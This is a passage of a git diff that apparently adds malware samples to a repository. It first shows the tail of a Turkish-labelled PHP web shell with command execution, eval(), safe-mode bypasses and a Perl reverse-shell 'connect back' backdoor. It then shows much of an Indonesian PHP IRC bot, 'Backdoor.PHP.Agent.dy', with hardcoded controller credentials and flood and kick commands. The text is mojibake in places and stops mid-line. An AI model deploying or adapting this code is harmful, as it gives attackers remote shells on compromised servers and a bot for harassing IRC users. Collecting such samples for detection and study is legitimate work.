";}} + if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);} + elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);} + function callperms($chkperms){ + $perms = fileperms($chkperms); + + if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; + } elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; + } elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; + } elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; + } elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; + } elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; + } elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; + } else { + // Unknown + $info = 'u'; + } + + // Owner + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + + // Group + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + + // World + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); print $info;} + + function readable_size($size) { + + if ($size < 1024) { + print $size . ' B'; + }else {$units = array("kB", "MB", "GB", "TB"); + foreach ($units as $unit) { + $size = ($size / 1024); + if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}} + if($dlink=='ren'&&!isset($_REQUEST['rensub'])){ + print ""; + print "
".$sf;input ("text","ren",$_REQUEST['ren'],20);print " "; + input ("text","renf","New-name",20);print " "; + input ("submit","rensub","Rename" ,"");print $ef;die();}else print ""; + if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){ + if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){ + print"
[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]
";print "";die();}else{print "
[ Yeniden Adlandirilamiyor ]
"; + print "";die();}}function fget($nscdir,$sf,$ef){print "
"; + print "
[ Editing ".basename($_REQUEST['edit'])." ] [ Geri ] [ Curr-Dir ]
"; + print $sf."
"; + if (is_writable($_REQUEST['edit'])){ + print "
".$ef;}else {print "
[ Can't edit + ".basename($_REQUEST['edit'])." ]

";}}function svetxt(){ + $fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){ + $nedittxt=stripslashes($_REQUEST['edittxt']); + fwrite ($fp,$nedittxt);print "
[ ".basename($_REQUEST['edit'])." Saved !! ]
";fclose($fp);}else {print "
[ Can't save the file !! ]
";}} + if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval'])) + {fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt'])) + {svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){ + $fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); + $fileowner=$fileownerarray['name']; $fileg=filegroup($file); + $groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name']; + print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){ + if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}} + elseif(isset($_REQUEST['mve'])){ + if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);} + }else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";} + if (isset ($_REQUEST['safefile'])){ + $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){ + if(empty($_GET['file'])){if(empty($_POST['file'])){ + print "
[ Please choose a file first to read it using copy() ]
"; + } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}} + $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){ + $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp)); + fclose($zrodlo);echo "
".$sta.htmlspecialchars($tekst).$eta."
";unlink($temp);} else { + print "
Sorry, Can't read the selected file !! +

";}}if (isset ($_REQUEST['inifile'])){ + ini_restore("safe_mode");ini_restore("open_basedir"); + print "
".$sta;
+ if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."
";} + if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);} + function callback($nscdir,$bip,$bport){ + if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";} + if (is_writable($nscdir)){ + $fp=fopen ("back.pl","w");$backpl='back.pl';} + else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';} + fwrite ($fp,"use Socket; + \$system='$epath'; + \$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\"; + echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo; + echo \"[ User perms ][$]\";echo \"`id`\";echo; + echo \"[ Start shell ][$]\";'; + + if (!\$ARGV[0]) { + exit(1); + } + \$host = \$ARGV[0]; + \$port = 80; + if (\$ARGV[1]) { + \$port = \$ARGV[1]; + } + \$proto = getprotobyname('tcp') || die('Unknown Protocol\n'); + socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n'); + my \$target = inet_aton(\$host); + if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) { + die('Unable to Connect\n'); + } + if (!fork( )) { + open(STDIN,'>&SERVER'); + open(STDOUT,'>&SERVER'); + open(STDERR,'>&SERVER'); + print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]'; + print '\n[ A-S-T team ][ Lezr.com ]\n\n'; + system(\$sys);system (\$system); + exit(0); } + ");callfuncs("chmod 777 $backpl"); + ob_start(); + callfuncs("perl $backpl $bip $bport"); + ob_clean(); + print "
[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]
+ [ Check your connection now, if failed try changing the port number ]
+ [ Or Go to a writable dir and then try to connect again ]
+ [ Return to the Current dir ] [ Curr-Dir ] +

";}if (isset($_REQUEST['uback'])){ + $uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; + if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");} + elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");} + elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}} + delm("# Komut ÇAlistir #");print ""; + print ""; + print ""; + print ""; + print ""; + print ""; + print ""; + delm("");print "
"; + print $st.$c1."
".$mess3.$ec; + print $c2.$sf."
";input("text","cfile","",53); + input("hidden","scdir",$nscdir,0);print "
"; + input("submit","crefile","Olustur",""); + print " ";input("submit","delfile","Sil",""); + print "
".$ef.$ec.$et."
".$st.$c1; + print "
Enter the command to execute";print $ec; + print $c2.$sf."
"; + input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"
"; + input("submit","","Execute","");print "
".$ef.$ec.$et."
";print $st.$c1; + print "
$mess".$ec.$c2.$sf."
"; + input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "
"; + input("submit","credir","Create-D","");print " "; + input("submit","deldir","Delete-D",""); + print "
".$ef.$ec.$et."
";print $st.$c1; + print "
Dosya Düzenle/Oku".$ec;print $c2.$sf."
"; + input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "
"; + input("submit","","Oku-Düzenle","");print "
".$ef.$ec.$et."
";print $st.$c1; + print "
Dizin'i Göster
";print $ec.$c2.$sf."
"; input("text","scdir",$nscdir,59);print"
"; + input("submit","","Göster","");print " "; + input("reset","","R00T","");print "
".$ef.$ec.$et."
";print $st.$c1; + print "
Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."
"; + input("file","upfile","",40);input("hidden","scdir",$nscdir,0); + input("hidden","up",$nscdir,0); + print"
";input("submit","","Upload","");print "
".$ef.$ec.$et."
";print "
"; + print $st.$c1."
Execute php code with eval()
"; + print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); + print " 
"; + input('submit','evsub','Execute');print " "; + input('Reset','','Reset');print " "; + print "
".$ec.$ef.$et; + print "
"; + print $st.$c1."
Execute useful commands
"; + print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); + print "
";print"
"; + print $ec.$ef.$et."
";delm(""); + print ""; + print "
"; + print $st.$c1."
".$cpmvmess."
"; + print $ec.$c2.$sf." ";input("text","ftcpy","File-name",15); + print " To "; + input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " "; + input("submit","cpy","Copy","");print " ";input("submit","mve","Move",""); + print "".$ec.$ef.$et; + print "
"; + print $st.$c1."
Cok kullanilan Komutlar
"; + print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0); + print " ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "".$ec.$ef.$et; + print "
";delm(": Safe mode bypass :"); + print ""; + print "
"; + print $st.$c1."
Using copy() function
"; + print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75); + input("hidden","scdir",$nscdir,0);print " "; + input("submit","","Read-F","");print "".$ec.$ef.$et; + print "
"; + print $st.$c1."
Using ini_restore() function
"; + print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75); + input("hidden","scdir",$nscdir,0);print " "; + input("submit","","Read-F","");print "".$ec.$ef.$et; + print "
";delm("# Backdoor Baglantisi #"); + print ""; + print "
"; + print $st.$c1."
Backdoor ile Baglan
"; + print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " "; + input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " "; + input("submit","","Connect","");print " ";input("reset","","Reset",""); + print "".$ec.$ef.$et;print "
";print $st.$c1."
Yüklenmis Backdoor
"; + print $ec.$c2.$sf." ";print "";print " "; + input("text","uback","back.pl",23);print " "; + input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect"); + print "".$ec.$ef.$et;print "
"; + print "
"; print"
"; + print"
Copyright is reserved to Ekin0x
[ By Cyber Security TIM Go to : www.cyber-warrior.org ]"; + print"
"; + include ($a.$b.$c); + ?> + diff --git a/PHP/Backdoor.PHP.Agent.dy b/PHP/Backdoor.PHP.Agent.dy new file mode 100644 index 00000000..66a544b5 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.dy @@ -0,0 +1,628 @@ +", +" :P~", +" :D", +",", +".", +"a", +"i", +"u", +"e", +"o", +"z", +"v", +"z", +"x", +"c", +"p", +"m", +"t", +"k", +"b", +"s", +"u", +"bot", +"g", +"lo", +"jo", +"lol" +); +$tsu1=array("`","|","[","]","{","}","^","_"); +$tsu2=array("`","|","[","]","{","}","^","-","\\","_"); +$nicky=array( + "cew_im0ed", + "cew_isepin", + "cew_maud", + "cew_like_ml", + "cew_butuh", + "cew_suka_dorong", + "cew_gerobak", + "cew_soto", + "cew_bakso", + "cew_gado", + "cew_burik", + "cew_panas", + "cew_tempat", + "cew_asbak", + "cew_jual_kambing", + "cew_utis_surya", + "cew_notepad", + "cew_spg_montok_abis", + "cew_diam_saja", + "cew_bantal", + "cew_udunen", + "cew_poraken", + "cew_suka_bawahmu", + "cew_kutilen", + "cew_bokong", + "cew_jujur", + "cew_urat_nadi", + "cew_butuh_kamu", + "cew_tentara", + "cew_monitor", + "cew_dodol_wedus", + "cew_burik_beceng", + "cew_blethang", + "cew_kerbuy", + "cew_brekay", + "cew_lesbong", + "cew_napi", + "cew_wlingi", + "cew_kauman", + "cew_pendaki", + "cew_lesoh", + "cew_cari_co_gede", + "cew_suka_ditimang", + "cew_binasa", + "cew_dandong^fs", + "cew_kepeten", + "cew_bisadiboking", + "cew_jalanjalan", + "cew_tawangmangu", + "cew_suka_kentut", + "cew_duh_burik" + + +); +$usr1=array( +"BLoodroSE", +); + +$nick = $nicky[rand(0,count($nicky) - 1)]; +$awaymsg = "4Ã� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚»8!4Ã� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚« 4tawa 8CÃ� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚®Ã� ’Ã� ’Æ’Ã� ’� ’Ã� ’Ã� ’‚Ã� ’‚«wS 4Ã� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚»8!4Ã� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚«"; +$identify = 'serang'; +$Admin = 'paijoe'; +$BOT_PASSWORD = 'serang'; +$channels = '#xirc'; +$remotehst2= array("irc.mojok.org","irc.indoirc.net"); +$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)]; +$port = '6667'; +$realname = '8,1^_1,13B13,1L1,13o13,1o1,13D13,1S8,1_^'; +$counterfp = 0; +$channels = str_replace("CNL","#",$channels); +print ""; +print "== Connecting to $remotehost..."; + + +$raway = "on"; +$log = "off"; +$saway = "1"; +if (!$stime) { $stime = time(); } +if (!$port) { $port = "6666"; } +$Admin = strtolower($Admin); +$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin")); + +$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)]; +$keluar = 0; +$akill = 1; +$katime = 0; +$localhost = 'localhost'; +$dayload = date("H:i:s d/m/Y"); +ini_set('user_agent','MSIE 5\.5;'); +set_time_limit(0); +define ('CRL', "\r\n"); +$channels = strtolower($channels)." "; +$channel = explode(" ", $channels); + +do { + $fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30); + if(!$fp) { + if ( $counterfp <= 200 ) { + $counterfp = $counterfp+1; + working($nick); + } + else { + print "
Cannot connect to $remotehost!
Please Try Another Server!"; + $keluar = 1; + exit; + } + } + print "
== Suceeded connection"; + $Header = 'NICK '.$nick . CRL; + $Header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL; + fputs($fp, $Header); + $response = ''; + while (!feof($fp)) { + $response .= fgets($fp, 1024); + while (substr_count($response,CRL) != 0) { + $offset = strpos($response, CRL); + $data = substr($response,0,$offset); + $response = substr($response,$offset+2); + if (substr($data,0,1) == ':') { + $offsetA = strpos($data, ' '); + $dFrom = substr($data,1,$offsetA-1); + $offsetB = strpos($data, ' :'); + $dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1); + $offsetC = strpos($data, '!'); + $dNick = substr($data,1,$offsetC-1); + $iText = substr($data,$offsetB+2); + if ( substr($dCommand,0,3) == '004' ) { + fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL); + if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); } + fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL); + foreach ($channel as $v) { + fputs($fp, 'JOIN ' .$v . CRL); + } + $pong1 = '1'; + } + elseif (substr($dCommand,0,3)=='465') { + print "
== This bot have been autokilled."; + $akill = 2; + } + elseif (substr($dCommand,0,3)=='433') { + $nick = $nicky[rand(0,count($nicky) - 1)]; + fputs($fp, 'NICK '.$nick . CRL); + } + elseif (substr($dCommand,0,3)=='432') { + $nick = $nick.$username; + fputs($fp, 'NICK '.$nick . CRL); + } + if (eregi('.dal.net',$dNick) && $akill==2) { + if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) { + print "
".strstr($data,'***')." "; + + if (eregi('Your IP is',$data)) { + $keluar = 1; + exit; + } + } + } + $dcom = explode(" ", $dCommand); + $dNick = strtolower($dNick); + if ($dcom[0]=='KICK' && $dcom[2]==$nick) { + fputs($fp, 'JOIN ' .$dcom[1]. CRL); + } + elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["pass"]) { + if ($auth["$dNick"]["auth"]==2) { + + if ($dcom[0]=='NICK') { + $com = explode(" ", $data); + $chnick = strtolower(str_replace(':','',$com[2])); + if ($dNick!=$chnick) { + $auth["$dNick"]["auth"] = 1; + fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL); + } + } else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); } + } + } else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); } + } + } + elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) { + $dcom[2] = strtolower($dcom[2]); + if ($auth["$dcom[2]"]) { + if ($auth["$dcom[2]"]["pass"]) { + if ($auth["$dcom[2]"]["auth"]==1) { + $auth["$dcom[2]"]["auth"] = 2; $whois = ""; + fputs($fp,'NOTICE ' . $dcom[2] . ' :You`re Authorized as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password bener bos seep! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Pass salah cux! Type: pass To Set Your Own Password then Auth Again ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); } + } + elseif ($dcom[0]=='NOTICE') { + $com = explode(" ", $data); + if ($com[3]==':KB' && $com[4] && $com[5] && $com[6]) { + $msg = str_replace('','',$data); + $msg = strstr($msg,":KB"); + $msg = str_replace(":KB $com[4]","",$msg); + fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL); + fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL); + } + } + elseif ($dcom[0]=='PRIVMSG') { + $com = explode(" ", $data); + if ($com[3]==':VERSION') { + fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION iLhaMiRc ajaH:p'.chr(1) . CRL); + } + elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["pass"]) { + if ($auth["$dNick"]["auth"]==1) { + if ($com[4]===$auth["$dNick"]["pass"]) { + $auth["$dNick"]["auth"] = 2; + fputs($fp,'NOTICE ' . $dNick . ' :You`re Authorized as '.$auth["$dNick"]["status"].' of this bot! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :password salah! Auth salah cok! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass To Set Your Own Password then Auth Again ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["pass"]) { + if ($auth["$dNick"]["auth"]==2) { + $auth["$dNick"]["auth"] = 1; + fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass To Set Your Own Password then Auth Again ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) { + if ($auth["$dNick"]) { + if (!$auth["$dNick"]["pass"]) { + $auth["$dNick"]["pass"] = $com[4]; + $auth["$dNick"]["auth"] = 1; + fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth To Authorized Imediately! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Already Set! Type: auth To Get Authorized ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["auth"]==2) { + if ($com[4]===$auth["$dNick"]["pass"]) { + $auth["$dNick"]["pass"] = $com[5]; + fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth To Authorized Imediately! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass To Change Your Auth Pass ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth To Authorized ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) { + $com[4] = strtolower($com[4]); + if ($auth["$dNick"]["auth"]==2) { + if ($auth["$dNick"]["status"]=="Admin") { + if ($com[5]=="master" || $com[5]=="user") { + $auth["$com[4]"]["name"] = $com[4]; + $auth["$com[4]"]["status"] = $com[5]; + fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass To Set Your Pass ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser ' . CRL); } + } elseif ($auth["$dNick"]["status"]=="master") { + if (!$auth["$com[4]"]) { + if ($com[5]=="user") { + $auth["$com[4]"]["name"] = $com[4]; + $auth["$com[4]"]["status"] = $com[5]; + fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass user ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth To Authorized ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) { + $com[4] = strtolower($com[4]); + if ($auth["$dNick"]["auth"]==2) { + if ($auth["$dNick"]["status"]=="Admin") { + if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") { + unset($auth["$com[4]"]); + fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser ' . CRL); } + } elseif ($auth["$dNick"]["status"]=="master") { + if ($auth["$com[4]"]["status"]=="user") { + unset($auth["$com[4]"]); + fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth To Authorized ' . CRL); } + } + elseif ($auth["$dNick"]["status"]) { + if (ereg(":`",$com[3]) || ereg(":!",$com[3])) { + $chan = strstr($dCommand,"#"); + $anick = str_replace("PRIVMSG ","",$dCommand); + if ($com[3]==':!auth') { + if ($auth["$dNick"]["auth"]==2) { + fputs($fp,'NOTICE '.$dNick.' :You`re already Authorized!' . CRL); + } else { + $whois = $dNick; + fputs($fp,'WHOIS '.$dNick . CRL); + } + } elseif ($com[3]==':`auth' && $chan) { + if ($auth["$dNick"]["auth"]==2) { + fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' siap bos!' . CRL); + } else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' bukan bosku cok!' . CRL); } + } elseif ($auth["$dNick"]["auth"]==2) { + if ($com[3]==':`say' && $com[4] && $chan) { + $msg = strstr($data,":`say"); + $msg = str_replace(":`say ","",$msg); + fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL); + } + elseif ($com[3]==':`act' && $com[4] && $chan) { + $msg = strstr($data,":`act"); + $msg = str_replace(":`act ","",$msg); + fputs($fp,'PRIVMSG '.$chan.' :ACTION '.$msg.''. CRL); + } + elseif ($com[3]==':`slap' && $com[4] && $chan) { + fputs($fp,'PRIVMSG '.$chan.' :ACTION slaps '.$com[4].' Tepat Di jidat 4pake kursi, kompor, penggorengan, plus tahi kuda... 2JeGuuuERRR... PleeTHaaQQQ ... DeeZZiiNGhHH ... 12cukuliinn dach loe ... monyong² tuh jidat ... hahahahakZ :4P~'. CRL); + } + elseif ($com[3]==':`msg' && $com[4] && $com[5]) { + $msg = strstr($data,":`msg"); + $msg = str_replace(":`msg $com[4] ","",$msg); + fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL); + } + elseif ($com[3]==':`notice' && $com[4] && $com[5]) { + $msg = strstr($data,":`notice"); + $msg = str_replace(":`notice $com[4] ","",$msg); + fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL); + } + elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) { + $msg = strstr($data,":`ctcp"); + $msg = str_replace(":`ctcp $com[4] ","",$msg); + fputs($fp,'PRIVMSG '.$com[4].' :'.$msg.''. CRL); + } + elseif ($com[3]==':`ping' && $chan) { + $sml = $smile[rand(0,count($smile) - 1)]; + fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PONG! '.$sml. CRL); + } + elseif ($com[3]==':`pong' && $chan) { + $sml = $smile[rand(0,count($smile) - 1)]; + fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PING! '.$sml. CRL); + } + elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") { + $bhost = $_SERVER['HTTP_HOST']; + $bphp = $_SERVER['PHP_SELF']; + fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL); + } + elseif ($com[3]==':`up' && $chan) { + fputs($fp, 'PRIVMSG chanserv@services.dal.net :op '.$chan.' '.$nick . CRL); + } + elseif ($com[3]==':`down' && $chan) { + fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL); + } + elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") { + $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)]; + fputs($fp, 'NICK '.$nicktsu . CRL); + if (substr($dCommand,0,3)=='433') { + $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)]; + fputs($fp, 'NICK '.$nicktsu . CRL); + } + $msg = strstr($data,":tsunami"); + $msg = str_replace(":tsunami $com[4]","",$msg); + if (ereg("#", $com[4])) { + fputs($fp, 'JOIN '.$com[4] . CRL); + } + fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'' . CRL); + fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'' . CRL); + fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI '.$msg.'' . CRL); + fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'' . CRL); + fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'' . CRL); + + fputs($fp, 'PRIVMSG '.$com[4].' :FLOOD '.$msg.'' . CRL); + if (ereg("#", $com[4])) { + fputs($fp, 'PART '.$com[4].' :Complete' . CRL); + fputs($fp, 